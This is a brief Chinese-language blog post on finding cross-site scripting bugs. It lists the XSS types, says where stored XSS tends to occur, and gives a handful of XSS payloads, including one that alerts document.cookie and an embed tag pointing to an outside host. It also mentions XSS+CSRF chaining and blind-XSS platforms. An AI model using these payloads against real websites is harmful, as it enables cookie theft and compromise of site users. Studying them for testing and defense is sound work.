漏洞挖掘之xss

标签：漏洞   one   http   textarea   输入   info   tin   rip   tar   

xss(跨站脚本)

分类：1.反射型xss

　　　2.DOM型xss

　　   3.存储型xss

这是某次挖的xss

存储型xss可能出现在评论处，用户个人信息处等

部分xsspaload:

"><script>alert(1)</script>//
<img src=x onerror=alert(2)>
<svg /onload=alert`1`>
<embed src=//tiny.cc>
</textarea><script>alert(document.cookie)</script><textarea>
</span><img src=x onerror=alert(1)><span>

一切存在输入的地方皆可能存在xss,注意xss不仅仅是弹框

利用：xss+csrf 

　　　盲打平台

　　　...

漏洞挖掘之xss

标签：漏洞   one   http   textarea   输入   info   tin   rip   tar   

原文地址：https://www.cnblogs.com/akihi-lu1l/p/12329539.html